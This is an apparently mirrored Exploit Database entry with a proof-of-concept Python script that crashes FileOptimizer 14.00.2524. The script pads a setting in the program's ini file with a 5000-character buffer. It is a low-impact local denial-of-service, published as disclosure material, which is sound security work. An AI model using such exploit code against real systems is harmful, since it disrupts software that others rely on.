FileOptimizer 14.00.2524 – Denial of Service (PoC)

• Exploit Database
• 30 阅读

• 作者： SYANiDE
  日期： 2019-11-05
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47586/

• # Exploit Title:FileOptimizer 14.00.2524 - Denial of Service (PoC)
  # Date: 2019-11-04
  # Exploit Author: Chase Hatch (SYANiDE)
  # Vendor Homepage: https://sourceforge.net/projects/nikkhokkho/
  # Software Link: https://sourceforge.net/projects/nikkhokkho/files/FileOptimizer/14.00.2524/FileOptimizerSetup.exe/download
  # Version: 14.00.2524
  # Tested on: Windows 7 Ultimate x86 SP0
  # CVE : none
  
  ## Steps to reproduce
  ## Open application for the first time so it generates "FileOptimizer32.ini" in the install directory
  ## Run the PoC
  ## Open FileOptimizer again, navigating to "Optimize" / "Options".
  ## Click OK to crash
  
  #! /usr/bin/env python
  import os, sys, re
  
  test="TempDirectory="# variable/str in config file to replace with buffer
  dir = "C:\\Program Files\\FileOptimizer\\"
  file = "FileOptimizer32.ini"
  
  sploit = "A"*5000
  
  temp = open(dir+file,'r').read()
  temp2 = re.sub(test, test + sploit, temp) 
  with open(dir+file,'w') as F:
  F.write(temp2)
  F.close()